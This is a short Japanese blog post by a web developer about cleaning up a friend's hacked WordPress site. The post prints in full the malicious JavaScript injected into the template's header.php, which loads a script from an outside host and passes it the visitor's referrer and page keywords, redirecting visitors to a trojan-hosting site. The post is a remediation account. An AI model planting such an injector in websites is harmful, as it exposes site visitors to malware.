同業者友人から、「サーバーを移動させたい」と、連絡が。
URLを開いてみると、
またか・・・
「またか」というのは、実は、今回3回目。
前回は、踏み台にされて、メール送信されたとかで、
アカウント停止を食らった、今回と同じハッキングされた系。
***
リダイレクトがかかって、
トロイの木馬が埋め込まれているサイトに飛ばされるます
時計メーカーのサイトなので、わりと質が悪い・・・
.
ウィルスソフトを入れてなかったら、感染するんでしょうね??
長期に渡り、踏み台にされ、
最後は、銀行からお金を抜き取られる始末
ハッキングされた原因
- WordPressの是弱性を狙われたのか、
- FTPのパスワードがカンタン
が、原因だと思われます。
でも、普通にFTPで書き換えられたのなら、
ファイルの日付が更新されるはずなんですが、
日付が変わってない!!
つまり、サーバーに侵入されたたとしか、考えられない状況!
***
今回、改ざんされたサーバーは、lolipopですが、
2016年はじめ、ログイン先やIDなどが、一斉に変更になりました。
古いサーバーからの移行だと思っていたのですが、
どうもそれだけではなかった
と、思う今日このごろです。
原因は、テンプレート内のheader.php内にjavascriptが追加されていました。
- php > header / locate
- javascript > eval
などで、あたりをつけたのですが、該当せず、
jqueryの文字を含む外部リンクでしたが、
<!--script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://181804.webhosting58.1blu.de/js/jquery.min.php?c_utt=I92930&c_utm='+encodeURIComponent('http://181804.webhosting58.1blu.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}
コメントアウトしてみたところ、ビンゴ!!
***
以前直してあげたサイトは、
その後、何も言ってこないので、
とりあえず、パスワード変えて、様子見。
